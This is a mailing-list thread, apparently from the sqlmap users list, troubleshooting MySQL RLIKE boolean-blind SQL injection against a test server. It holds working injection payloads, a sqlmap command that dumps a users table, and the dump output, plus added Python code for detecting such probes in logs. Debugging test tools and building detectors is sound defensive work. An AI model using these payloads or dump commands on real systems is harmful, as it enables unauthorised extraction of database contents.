> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
> Empty set (0.00 sec)
>
> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>
> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>
> mysql> SELECT `name` from users LIMIT 0,1;
> +-------+
> | name  |
> +-------+
> | admin |
> +-------+
> 1 row in set (0.00 sec)
>
> mysql>
>
> I believe that you have a problem with the order of returned results. You can't expect query results to be returned in a deterministic way. That's just how the DBMS works.
>
> Also, that's why we use ORDER BY wherever we can, to skip this kind of problem. If you take a look into -v 3 of your run in sqlmap you'll see that it uses "ORDER BY", while you don't use it in your case:
>
> [14:30:20] [PAYLOAD] 1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(name AS CHAR),0x20) FROM testdb.users ORDER BY id LIMIT 0,1),6,1))>2) THEN 1 ELSE 0x28 END))
>
> Kind regards,
> Miroslav Stampar
>
> On Sun, Feb 22, 2015 at 2:16 PM, Miroslav Stampar <mir...@gm...> wrote:
> "I only bring it up because sql map has no problem grabbing the database with rlike but can't enumerate the values from the user table"
>
> $ python sqlmap.py -u "http://192.168.223.129/sqlmap/mysql/get_int.php?id=1" --batch --test-filter="RLIKE" --dump -D testdb -T users
>
> ...
>
> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
> ---
> Parameter: id (GET)
>     Type: boolean-based blind
>     Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
>     Payload: id=1 RLIKE (SELECT (CASE WHEN (7668=7668) THEN 1 ELSE 0x28 END))
> ---
> ...
>
> [14:14:52] [INFO] postprocessing table dump
> Database: testdb
> Table: users
> [5 entries]
> +----+--------+-----------------------------------------+
> | id | name   | surname                                 |
> +----+--------+-----------------------------------------+
> | 1  | luther | blissett                                |
> | 2  | fluffy | bunny                                   |
> | 3  | wu     | ming                                    |
> | 4  | NULL   | nameisnull                              |
> | 5  | md5    | 098f6bcd4621d373cade4e832627b4f6 (test) |
> +----+--------+-----------------------------------------+
>
> On Sat, Feb 21, 2015 at 10:59 PM, Brandon Perry <bpe...@gm...> wrote:
> Right, in the sql statement where I select 'a', the ord of this is not greater than 112, and it fails as expected with parens not balanced.
>
> The query below this that selects the first name from users should be functionally equivalent to select 'a' as mid is used to select the first character of the first username which is 'admin' as shown, but this statement does not fail as expected.
>
> I am at a loss as to why the latter does not fail when the inner select is functionally equivalent to select 'a', and the former fails as expected.
>
> I only bring it up because sql map has no problem grabbing the database with rlike but can't enumerate the values from the user table, and I logged into the server as root to try to figure out what the issue might be and this seems to be the root cause.
>
> Sent from a phone
>
> On Feb 21, 2015, at 3:35 PM, Miroslav Stampar <mir...@gm...> wrote:
>
>> Hi.
>>
>> Maybe I'm mistaken, but you are looking at this RLIKE wrong. Its function here (in your case) is to PROVOKE errors on False, and that's exactly what's going on here.
>>
>> In case of True, RLIKE is called with perfectly valid 0x7474747474, while in case of False it's called with erroneous regexp 0x28 ('parentheses not balanced').
>>
>> Bye
>>
>> On Sat, Feb 21, 2015 at 8:21 PM, Brandon Perry <bpe...@gm...> wrote:
>> Have an injection that I can use RLIKE to induce a 500 error, but it only works in some circumstances. Enumerating the DATABASE() value works, as well as the current user, but enumerating values from the database tables fails. Even as root on the box, the RLIKE query fails to throw an exception when attempting to use RLIKE in some instances.
>>
>> As you can see in the output below, the user can select the first name value from the users table (which is 'admin'). When using RLIKE to test the first character returned with DATABASE() (a 'p'), you get the parentheses not balanced exception as expected. You also get this exception when simply selecting 'a'.
>>
>> But when you select the first row from the users table and grab the first character (an 'a'), no exception is thrown and an empty result set is returned.
>>
>> Any thoughts?
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>> Empty set (0.01 sec)
>>
>> mysql> SELECT `name` from users LIMIT 0,1;
>> +-------+
>> | name  |
>> +-------+
>> | admin |
>> +-------+
>> 1 row in set (0.00 sec)
>>
>> mysql>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
|
From: Bruno F. <ch...@ch...> - 2015-02-22 14:40:59
|
Hello everyone,

I just started using sqlmap and it detects basic stuff fine so far (database, operating system, PHP version, ...) but when it comes to retrieving information I get a lot of garbage that I can't make sense of. An example of this 'garbage text' can be seen in the attached screenshot.

For those wondering, this is for a security challenge (that is one of many things that happened as part of the computer science week in the university) and my final goal is to be able to list files in the server (and if they are out of the www folder, I should still be able to read them somehow).

But my question is about all those strange characters that can be seen in the attached picture and how to convert them to something useful.

Thank you.

Bruno Ferreira
|
From: Miroslav S. <mir...@gm...> - 2015-02-22 13:31:37
|
Hi again.

I believe that we have a problem here. I am trying to reproduce your "problem" and can't do it:

mysql> select * from users;
+----+--------+----------------------------------+
| id | name   | surname                          |
+----+--------+----------------------------------+
|  1 | admin  | blissett                         |
|  2 | fluffy | bunny                            |
|  3 | wu     | ming                             |
|  4 | NULL   | nameisnull                       |
|  5 | md5    | 098f6bcd4621d373cade4e832627b4f6 |
+----+--------+----------------------------------+
5 rows in set (0.00 sec)

mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
Empty set (0.00 sec)

mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp

mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp

mysql> SELECT `name` from users LIMIT 0,1;
+-------+
| name  |
+-------+
| admin |
+-------+
1 row in set (0.00 sec)

mysql>

I believe that you have a problem with the order of returned results. You can't expect query results to be returned in a deterministic way. That's just how the DBMS works.

Also, that's why we use ORDER BY wherever we can, to skip this kind of problem. If you take a look into -v 3 of your run in sqlmap you'll see that it uses "ORDER BY", while you don't use it in your case:

[14:30:20] [PAYLOAD] 1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(name AS CHAR),0x20) FROM testdb.users ORDER BY id LIMIT 0,1),6,1))>2) THEN 1 ELSE 0x28 END))

Kind regards,
Miroslav Stampar

On Sun, Feb 22, 2015 at 2:16 PM, Miroslav Stampar <mir...@gm...> wrote:
> "I only bring it up because sql map has no problem grabbing the database with rlike but can't enumerate the values from the user table"
>
> $ python sqlmap.py -u "http://192.168.223.129/sqlmap/mysql/get_int.php?id=1" --batch --test-filter="RLIKE" --dump -D testdb -T users
>
> ...
>
> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
> ---
> Parameter: id (GET)
>     Type: boolean-based blind
>     Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
>     Payload: id=1 RLIKE (SELECT (CASE WHEN (7668=7668) THEN 1 ELSE 0x28 END))
> ---
> ...
>
> [14:14:52] [INFO] postprocessing table dump
> Database: testdb
> Table: users
> [5 entries]
> +----+--------+-----------------------------------------+
> | id | name   | surname                                 |
> +----+--------+-----------------------------------------+
> | 1  | luther | blissett                                |
> | 2  | fluffy | bunny                                   |
> | 3  | wu     | ming                                    |
> | 4  | NULL   | nameisnull                              |
> | 5  | md5    | 098f6bcd4621d373cade4e832627b4f6 (test) |
> +----+--------+-----------------------------------------+
>
> On Sat, Feb 21, 2015 at 10:59 PM, Brandon Perry <bpe...@gm...> wrote:
>
>> Right, in the sql statement where I select 'a', the ord of this is not greater than 112, and it fails as expected with parens not balanced.
>>
>> The query below this that selects the first name from users should be functionally equivalent to select 'a' as mid is used to select the first character of the first username which is 'admin' as shown, but this statement does not fail as expected.
>>
>> I am at a loss as to why the latter does not fail when the inner select is functionally equivalent to select 'a', and the former fails as expected.
>>
>> I only bring it up because sql map has no problem grabbing the database with rlike but can't enumerate the values from the user table, and I logged into the server as root to try to figure out what the issue might be and this seems to be the root cause.
>>
>> Sent from a phone
>>
>> On Feb 21, 2015, at 3:35 PM, Miroslav Stampar <mir...@gm...> wrote:
>>
>> Hi.
>>
>> Maybe I'm mistaken, but you are looking at this RLIKE wrong. Its function here (in your case) is to PROVOKE errors on False, and that's exactly what's going on here.
>>
>> In case of True, RLIKE is called with perfectly valid 0x7474747474, while in case of False it's called with erroneous regexp 0x28 ('parentheses not balanced').
>>
>> Bye
>>
>> On Sat, Feb 21, 2015 at 8:21 PM, Brandon Perry <bpe...@gm...> wrote:
>>
>>> Have an injection that I can use RLIKE to induce a 500 error, but it only works in some circumstances. Enumerating the DATABASE() value works, as well as the current user, but enumerating values from the database tables fails. Even as root on the box, the RLIKE query fails to throw an exception when attempting to use RLIKE in some instances.
>>>
>>> As you can see in the output below, the user can select the first name value from the users table (which is 'admin'). When using RLIKE to test the first character returned with DATABASE() (a 'p'), you get the parentheses not balanced exception as expected. You also get this exception when simply selecting 'a'.
>>>
>>> But when you select the first row from the users table and grab the first character (an 'a'), no exception is thrown and an empty result set is returned.
>>>
>>> Any thoughts?
>>>
>>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>>
>>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>>
>>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>>> Empty set (0.01 sec)
>>>
>>> mysql> SELECT `name` from users LIMIT 0,1;
>>> +-------+
>>> | name  |
>>> +-------+
>>> | admin |
>>> +-------+
>>> 1 row in set (0.00 sec)
>>>
>>> mysql>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm
|
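Added here as a defender's example (not sqlmap's code and not from anyone in this thread): a short Python log check that recognises the RLIKE/CASE oracle shape shown in the -v 3 payload above and counts the ERROR 1139 'parentheses not balanced' messages the False branch provokes. The log lines are constructed, the IPs are documentation addresses, and the script paths are assumptions.

```python
"""Flag MySQL RLIKE boolean-blind probing in web and DB logs.

Added example, not sqlmap code and not from anyone in this thread.
Two signals taken from the messages above:
  1. request parameters shaped like the RLIKE oracle payload
     (... RLIKE (SELECT (CASE WHEN (...) THEN ... ELSE 0x28 END)));
  2. MySQL ERROR 1139 "Got error 'parentheses not balanced' from regexp",
     which the False branch (regexp 0x28 = "(") provokes on purpose.
Sample log lines below are constructed; IPs are documentation addresses.
"""
import re
from urllib.parse import unquote_plus

# Signal 1: the CASE-inside-RLIKE oracle shape (case-insensitive, any whitespace).
RLIKE_ORACLE = re.compile(
    r"\bRLIKE\s*\(\s*SELECT\s*\(\s*CASE\s+WHEN\b.*?\bTHEN\b.*?\bELSE\b.*?\bEND\s*\)\s*\)",
    re.IGNORECASE | re.DOTALL,
)
# Signal 2: the regexp error text MySQL emits for an unbalanced "(" pattern.
REGEXP_ERROR = re.compile(r"Got error 'parentheses not balanced' from regexp")
# Minimal Common/Combined Log Format parser: client IP, request path, status.
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def is_rlike_oracle(query_string: str) -> bool:
    """True when the URL-decoded query string carries the RLIKE/CASE oracle."""
    return RLIKE_ORACLE.search(unquote_plus(query_string)) is not None


def scan_access_log(lines, threshold=3):
    """Per client IP, count oracle requests and how many drew a 5xx response.

    Only clients at or above `threshold` probes are returned: a boolean-blind
    extraction needs several requests per character, so a burst is the tell.
    """
    stats = {}
    for line in lines:
        m = ACCESS_LINE.match(line)
        if m is None:
            continue
        query = m.group("path").partition("?")[2]
        if not query or not is_rlike_oracle(query):
            continue
        entry = stats.setdefault(m.group("ip"), {"probes": 0, "server_errors": 0})
        entry["probes"] += 1
        if m.group("status").startswith("5"):
            entry["server_errors"] += 1
    return {ip: e for ip, e in stats.items() if e["probes"] >= threshold}


def count_regexp_errors(lines):
    """Count ERROR 1139 regexp failures in an application or DB error log."""
    return sum(1 for line in lines if REGEXP_ERROR.search(line))


# Constructed access log: three oracle probes from one client (payload shapes
# mirror the thread above), then ordinary traffic including a benign "RLIKE".
SAMPLE_ACCESS_LOG = [
    '192.0.2.7 - - [22/Feb/2015:14:14:52 +0100] "GET /get_int.php?id=1%20RLIKE%20(SELECT%20(CASE%20WHEN%20(7668=7668)%20THEN%201%20ELSE%200x28%20END)) HTTP/1.1" 200 512',
    '192.0.2.7 - - [22/Feb/2015:14:14:53 +0100] "GET /get_int.php?id=1%20RLIKE%20(SELECT%20(CASE%20WHEN%20(ORD(MID((SELECT%20DATABASE()),1,1))>112)%20THEN%200x7474747474%20ELSE%200x28%20END)) HTTP/1.1" 500 212',
    '192.0.2.7 - - [22/Feb/2015:14:14:54 +0100] "GET /get_int.php?id=1%20RLIKE%20(SELECT%20(CASE%20WHEN%20(ORD(MID((SELECT%20DATABASE()),1,1))>96)%20THEN%200x7474747474%20ELSE%200x28%20END)) HTTP/1.1" 200 512',
    '198.51.100.4 - - [22/Feb/2015:14:15:01 +0100] "GET /get_int.php?id=2 HTTP/1.1" 200 512',
    '198.51.100.4 - - [22/Feb/2015:14:15:09 +0100] "GET /search.php?q=RLIKE%20tutorial HTTP/1.1" 200 9001',
]

# Constructed application log carrying the DB error text seen in the thread.
SAMPLE_DB_LOG = [
    "2015-02-22 14:14:53 app[1234]: query failed: ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp",
    "2015-02-22 14:14:54 app[1234]: query ok (1 row)",
    "2015-02-22 14:14:55 app[1234]: query failed: ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp",
]

if __name__ == "__main__":
    print("oracle probes by client:", scan_access_log(SAMPLE_ACCESS_LOG))
    print("regexp errors:", count_regexp_errors(SAMPLE_DB_LOG))
```

The two counts should move together: a client whose oracle probes correlate with ERROR 1139 entries in the DB log is walking a string one character at a time, which is the behaviour the -v 3 payload above produces.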
From: Miroslav S. <mir...@gm...> - 2015-02-22 13:16:12
|
"I only bring it up because sql map has no problem grabbing the database with rlike but can't enumerate the values from the user table"

$ python sqlmap.py -u "http://192.168.223.129/sqlmap/mysql/get_int.php?id=1" --batch --test-filter="RLIKE" --dump -D testdb -T users
...
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1 RLIKE (SELECT (CASE WHEN (7668=7668) THEN 1 ELSE 0x28 END))
---
...
[14:14:52] [INFO] postprocessing table dump
Database: testdb
Table: users
[5 entries]
+----+--------+-----------------------------------------+
| id | name   | surname                                 |
+----+--------+-----------------------------------------+
| 1  | luther | blissett                                |
| 2  | fluffy | bunny                                   |
| 3  | wu     | ming                                    |
| 4  | NULL   | nameisnull                              |
| 5  | md5    | 098f6bcd4621d373cade4e832627b4f6 (test) |
+----+--------+-----------------------------------------+

On Sat, Feb 21, 2015 at 10:59 PM, Brandon Perry <bpe...@gm...> wrote:
> Right, in the sql statement where I select 'a', the ord of this is not
> greater than 112, and it fails as expected with parens not balanced.
>
> The query below this that selects the first name from users should be
> functionally equivalent to select 'a' as mid is used to select the first
> character of the first username which is 'admin' as shown, but this
> statement does not fail as expected.
>
> I am at a loss as to why the latter does not fail when the inner select is
> functionally equivalent to select 'a', and the former fails as expected.
>
> I only bring it up because sql map has no problem grabbing the database
> with rlike but can't enumerate the values from the user table, and I logged
> into the server as root to try to figure out what the issue might be and
> this seems to be the root cause.
>
> Sent from a phone
>
> On Feb 21, 2015, at 3:35 PM, Miroslav Stampar <mir...@gm...>
> wrote:
>
> Hi.
>
> Maybe I'm mistaken, but you are looking at this RLIKE wrong. Its function
> here (in your case) is to PROVOKE errors on False, and that's exactly
> what's going on here.
>
> In case of True, RLIKE is called with perfectly valid 0x7474747474, while
> in case of False it's called with erroneous regexp 0x28 ('parentheses not
> balanced').
>
> Bye
>
> On Sat, Feb 21, 2015 at 8:21 PM, Brandon Perry <bpe...@gm...>
> wrote:
>
>> Have an injection that I can use RLIKE to induce a 500 error, but it only
>> works in some circumstances. Enumerating the DATABASE() value works, as
>> well as the current user, but enumerating values from the database tables
>> fails. Even as root on the box, the RLIKE query fails to throw an exception
>> when attempting to use RLIKE in some instances.
>>
>> As you can see in the output below, the user can select the first name
>> value from the users table (which is ‘admin’). When using RLIKE to test the
>> first character returned with DATABASE() (a ‘p’), you get the parentheses
>> not balanced exception as expected. You also get this exception when simply
>> selecting ‘a’.
>>
>> But when you select the first row from the users table and grab the first
>> character (an ‘a’), no exception is thrown and an empty result set is
>> returned.
>>
>> Any thoughts?
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
>> (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
>> (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
>> (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN
>> 0x7474747474 ELSE 0x28 END));
>> Empty set (0.01 sec)
>>
>> mysql> SELECT `name` from users LIMIT 0,1;
>> +-------+
>> | name  |
>> +-------+
>> | admin |
>> +-------+
>> 1 row in set (0.00 sec)
>>
>> mysql>
>>

--
Miroslav Stampar
http://about.me/stamparm
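The payload shape discussed in this thread (a CASE that hands RLIKE a valid regex when the condition is true and the lone '(' denoted by 0x28 when it is false) is easy to recognise in request logs once the hex literals are decoded. The following Python is an added example, not code from sqlmap or from anyone in the thread: the request lines are constructed, and Python's re module stands in for MySQL's regexp engine to show which branch would raise the 'parentheses not balanced' error.

```python
import re
from urllib.parse import parse_qsl, urlparse

# Constructed request lines (not from the thread); the payloads mirror the
# RLIKE/CASE shape discussed above, URL-encoded as a client would send them.
SAMPLE_REQUESTS = [
    "GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1",
    "GET /sqlmap/mysql/get_int.php?id=1%20RLIKE%20(SELECT%20(CASE%20WHEN%20"
    "(7668%3D7668)%20THEN%201%20ELSE%200x28%20END)) HTTP/1.1",
    "GET /sqlmap/mysql/get_int.php?id=1%20RLIKE%20(SELECT%20(CASE%20WHEN%20"
    "(ORD(MID((SELECT%20DATABASE()),1,1))%20%3E%20112)%20THEN%20"
    "0x7474747474%20ELSE%200x28%20END)) HTTP/1.1",
]

RLIKE_CASE = re.compile(  # RLIKE (SELECT (CASE WHEN <cond> THEN <x> ELSE <y> END
    r"\bRLIKE\s*\(\s*SELECT\s*\(\s*CASE\s+WHEN\b.*?"
    r"\bTHEN\s+(\S+)\s+ELSE\s+(\S+)\s+END",
    re.IGNORECASE | re.DOTALL,
)
HEX_LITERAL = re.compile(r"^0x([0-9a-f]+)$", re.IGNORECASE)

def decode_literal(token):
    """Turn a MySQL hex literal such as 0x28 into the string it denotes, '('."""
    m = HEX_LITERAL.match(token)
    if not m:
        return token
    digits = m.group(1)  # odd-length 0x literals are read as left-padded with 0
    digits = digits.rjust(len(digits) + len(digits) % 2, "0")
    return bytes.fromhex(digits).decode("latin-1")

def regex_is_valid(pattern):
    """Python's re stands in for MySQL's regexp engine; both reject a lone '('."""
    try:
        re.compile(pattern)
        return True
    except re.error:
        return False

def analyse_request(line):
    path = line.split(" ", 2)[1]
    findings = []
    for name, value in parse_qsl(urlparse(path).query):
        m = RLIKE_CASE.search(value)
        if m:
            then_val, else_val = (decode_literal(t) for t in m.groups())
            # valid regex on True, broken one on False: the oracle the thread describes
            oracle = regex_is_valid(then_val) and not regex_is_valid(else_val)
            findings.append({"param": name, "then": then_val,
                             "else": else_val, "error_on_false": oracle})
    return findings
```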
